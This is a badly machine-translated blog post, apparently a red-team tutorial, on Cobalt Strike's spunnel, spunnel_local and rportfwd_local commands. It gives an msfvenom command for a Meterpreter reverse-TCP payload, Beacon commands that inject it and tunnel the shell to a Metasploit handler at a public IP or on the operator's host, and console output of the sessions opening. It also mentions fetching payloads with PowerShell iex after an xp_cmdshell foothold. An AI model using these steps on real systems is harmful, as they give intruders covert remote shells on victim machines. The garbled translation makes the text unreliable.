Cobalt Strike Spawn ＆ Tunnel

Cobalt Strike 4.2 A new set of “ Generation and tunneling ” command , be called spunnel and spunnel_local.

Core Impact yes HelpSystems The vulnerability exploitation framework ,HelpSystems Is the acquisition of strategic networks and Cobalt Strike The same company . Of course , They want to coordinate products under their umbrella , But this makes non CI It's easy for customers to think that this feature is not interesting or relevant .

however , The implementation is generic enough , You can take advantage of anything that can generate location independent shellcode Aggressive toolset for , So this article will demonstrate how to combine these commands with Meterpreter shellcode Use it together . But lasta , You may be thinking .Beacon There are already external listeners ,shspawn and shinject command , They can already pass Beacon Generate Meterpreter conversation . Why do we need more commands to do the same job ？

Aside from the offensive depth of the argument , External listeners are quite limited , Because it only supports 32 Bit and incompatible with phaseless payloads .shspawn and shinject More flexible , Because they allow us to provide arbitrary shellcode—— Include 64 Bit and stageless.

take Meterpreter C2 The flow returns to Metasploit The most obvious way is to use HTTP/S Load type —— The disadvantage is that it creates a new exit channel . If we have taken the time and care to make Beacon As far as possible, the flow becomes OPSEC Security , Then the whole process must be repeated to accommodate Meterpreter The conversation will not be an interesting time . This is why in the existing C2 Tunnel implantation in the tunnel is a good proposal .

beacon> help spunnel
Use: spunnel [x86|x64] [host] [port] [/path/to/agent.bin]

This is the spawn and tunnel command. Spawn an agent and create a reverse port forward tunnel to its controller.

Before we surpass ourselves , Let's generate a pointer to 127.0.0.1:4444 The reverse of TCP load .

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Saved as: /tmp/msf.bin

And then execute spunnel, among 184.105.181.155 Is to run Metasploit Framework Of the server IP.

beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin
[*] Tasked beacon to spawn msf.bin (x64) and forward 127.0.0.1:4444 to 184.105.181.155:4444
[+] started reverse port forward on 4444 to 184.105.181.155:4444
[+] host called home, sent: 200296 bytes

According to the normal function of reverse port forwarding , It will listen on the arrival port 4444 And forward it to 184.105.181.155:4444. So we got a new one TCP Meterpreter The conversation appears .

msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:4444

[*] Meterpreter session 1 opened (10.64.41.77:4444 -> 74.82.28.4:49194) at 2021-06-12 14:08:34 -0400

It doesn't seem so striking , Because it seems to be rportfwd + shspawn The combination of / Automated version . You can really do the same by running them on your own .

spunnel_local

When we look at spunnel_local when , Things have become more interesting .

beacon> help spunnel_local
Use: spunnel_local [x86|x64] [host] [port] [/path/to/agent.bin]

This is the spawn and tunnel command. Spawn an agent and create a reverse port forward, tunnelled through your Cobalt Strike client, to its controller.

And spunnel_local The main difference is , Traffic will be redirected all the way to run Cobalt Strike client The host , Not just Team Server. When we use Meterpreter In the example , This allows us to run on our own local machine Metasploit frame （ This machine 、VM or WSL etc. ）.

under these circumstances , I am here Windows Up operation CS client , stay Ubuntu Use in WSL2 function msfconsole. Set the multiprocessor to listen 0.0.0.0:4444.

msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:4444

WSL One consequence of this is , From my Windows From the perspective of the host , This is only bound to 127.0.0.1.

C:>netstat -anp tcp | findstr 4444
   TCP    127.0.0.1:4444         0.0.0.0:0              LISTENING

tell spunnel_local Bound to the 4444 And forward to 127.0.0.1:4444. Because the traffic all the way back to my host , So this is on my machine 127.0.0.1:4444, instead of “ The victim ” machine .

If you are using NAT、 Bridging or internal network VM Run in Metasploit, You will specify VM Of IP Address, not 127.0.0.1.

beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin
[*] Tasked beacon to spawn msf.bin (x64) and forward 127.0.0.1:4444 to rasta -> 127.0.0.1:4444
[+] started reverse port forward on 4444 to rasta -> 127.0.0.1:4444
[+] host called home, sent: 200296 bytes

[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:33144) at 2021-06-12 20:05:26 +0100

I think it is possible to run this type of tool locally in a virtual machine , And it can be set without manual operation iptables and ssh Port forwarding in case of mischief will tunnel all traffic back for use , It's really cool .

rportfwd_local

except spunnel Besides the command , One more rportfwd_local command .

You can infer that , This is a general method to generate reverse port forwarding , The port forwarding will return to... Through the tunnel Cobalt Strike The host , instead of Team Server.

Before I do some sort of RCE（ for example ,MS SQL On the box xp_cmdshell） And I think the implementation is not suitable for RCE Method for large load cases , I often use the reverse port to forward . image PowerShell one-liner adopt rportfwd To iex Things like that work very well .

The standard rportfwd An order requires Team Server Forward traffic to a publicly accessible IP（ Like our first spunnel As the sample ）, Or forward it to other places with the help of other forwarding magic .

and rportfwd_local Will allow us to host locally 、VM or WSL Start in Python HTTP The server , And let the remote host download the payload directly from us .